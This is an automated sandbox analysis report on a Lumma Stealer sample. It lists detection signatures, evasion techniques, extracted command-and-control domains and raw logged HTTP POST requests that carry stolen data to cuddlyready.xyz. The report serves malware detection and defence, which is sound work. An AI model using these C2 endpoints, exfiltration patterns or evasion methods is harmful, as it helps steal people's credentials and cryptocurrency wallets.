Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FjFeChttqA.exe

Overview

General Information

Sample name:FjFeChttqA.exe
renamed because original name is a hash value
Original sample name:e21681ef00ebfaee22cd2137a1349de0.exe
Analysis ID:1579752
MD5:e21681ef00ebfaee22cd2137a1349de0
SHA1:0159be57037eff8abb75c7c241d74f3c6d664739
SHA256:d4acd1d3bf333f1c82682d9dde01e983efb126548bea388ec3adddbedbbc094c
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FjFeChttqA.exe (PID: 5568 cmdline: "C:\Users\user\Desktop\FjFeChttqA.exe" MD5: E21681EF00EBFAEE22CD2137A1349DE0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "sendypaster.xyz", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "cuddlyready.xyz"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2201737747.00000000018D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2181449137.00000000018D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2180442038.0000000001923000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:35:08.458441+010020283713Unknown Traffic192.168.2.549704172.67.150.173443TCP
                2024-12-23T08:35:10.457322+010020283713Unknown Traffic192.168.2.549705172.67.150.173443TCP
                2024-12-23T08:35:12.837500+010020283713Unknown Traffic192.168.2.549706172.67.150.173443TCP
                2024-12-23T08:35:15.206047+010020283713Unknown Traffic192.168.2.549707172.67.150.173443TCP
                2024-12-23T08:35:17.578298+010020283713Unknown Traffic192.168.2.549708172.67.150.173443TCP
                2024-12-23T08:35:20.274938+010020283713Unknown Traffic192.168.2.549709172.67.150.173443TCP
                2024-12-23T08:35:22.759800+010020283713Unknown Traffic192.168.2.549711172.67.150.173443TCP
                2024-12-23T08:35:27.066778+010020283713Unknown Traffic192.168.2.549722172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:35:09.233152+010020546531A Network Trojan was detected192.168.2.549704172.67.150.173443TCP
                2024-12-23T08:35:11.233480+010020546531A Network Trojan was detected192.168.2.549705172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:35:09.233152+010020498361A Network Trojan was detected192.168.2.549704172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:35:11.233480+010020498121A Network Trojan was detected192.168.2.549705172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:35:13.877851+010020480941Malware Command and Control Activity Detected192.168.2.549706172.67.150.173443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: FjFeChttqA.exeAvira: detected
                Source: FjFeChttqA.exe.5568.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["supporse-comment.cyou", "steppriflej.xyz", "sendypaster.xyz", "pollution-raker.cyou", "ripe-blade.cyou", "greywe-snotty.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "cuddlyready.xyz"], "Build id": "LOGS11--LiveTraffic"}
                Source: FjFeChttqA.exeVirustotal: Detection: 67%Perma Link
                Source: FjFeChttqA.exeReversingLabs: Detection: 63%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: FjFeChttqA.exeJoe Sandbox ML: detected
                Source: FjFeChttqA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 172.67.150.173:443
                Source: Malware configuration extractorURLs: supporse-comment.cyou
                Source: Malware configuration extractorURLs: steppriflej.xyz
                Source: Malware configuration extractorURLs: sendypaster.xyz
                Source: Malware configuration extractorURLs: pollution-raker.cyou
                Source: Malware configuration extractorURLs: ripe-blade.cyou
                Source: Malware configuration extractorURLs: greywe-snotty.cyou
                Source: Malware configuration extractorURLs: hosue-billowy.cyou
                Source: Malware configuration extractorURLs: smash-boiling.cyou
                Source: Malware configuration extractorURLs: cuddlyready.xyz
                Source: DNS query: cuddlyready.xyz
                Source: Joe Sandbox ViewIP Address: 172.67.150.173 172.67.150.173
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.150.173:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5JA9ZIPKI4NUP0SN8PWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12847Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HBCJQNWCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15023Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XIB13SBIMPZZOTJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20555Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7QDMMQOYHL4WJ9TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1243Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8CDCBNTIAV9KNB81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570768Host: cuddlyready.xyz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: cuddlyready.xyz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: FjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: FjFeChttqA.exe, 00000000.00000003.2153684399.000000000613D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: FjFeChttqA.exe, 00000000.00000003.2262271308.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018B9000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
                Source: FjFeChttqA.exe, 00000000.00000003.2130098244.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130210926.00000000060B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/-
                Source: FjFeChttqA.exe, FjFeChttqA.exe, 00000000.00000003.2256614843.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2201607264.0000000006032000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256517204.0000000006032000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262372697.0000000006032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
                Source: FjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiP
                Source: FjFeChttqA.exe, 00000000.00000003.2256614843.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262452656.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018D1000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apip
                Source: FjFeChttqA.exe, 00000000.00000002.2264551472.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262271308.000000000193D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/d
                Source: FjFeChttqA.exe, 00000000.00000003.2219245311.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256430845.000000000193D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi_3
                Source: FjFeChttqA.exe, 00000000.00000003.2219245311.000000000193D000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256430845.000000000193D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/uo
                Source: FjFeChttqA.exe, 00000000.00000003.2130273838.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130098244.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130237981.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2130380012.00000000060B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
                Source: FjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apiBitwardeoo
                Source: FjFeChttqA.exe, 00000000.00000003.2152897561.00000000060AE000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2153363662.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2153298146.00000000060AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apil
                Source: FjFeChttqA.exe, 00000000.00000003.2201737747.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apint
                Source: FjFeChttqA.exe, 00000000.00000002.2264473271.000000000190E000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262304891.000000000190B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apizchhhv.default-release/key4.dbPK
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2176838867.0000000006031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: FjFeChttqA.exe, 00000000.00000002.2266880286.0000000006030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: FjFeChttqA.exe, 00000000.00000003.2106537927.000000000606E000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106697295.000000000606B000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2106614214.000000000606B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: FjFeChttqA.exe, 00000000.00000003.2154654502.0000000006353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
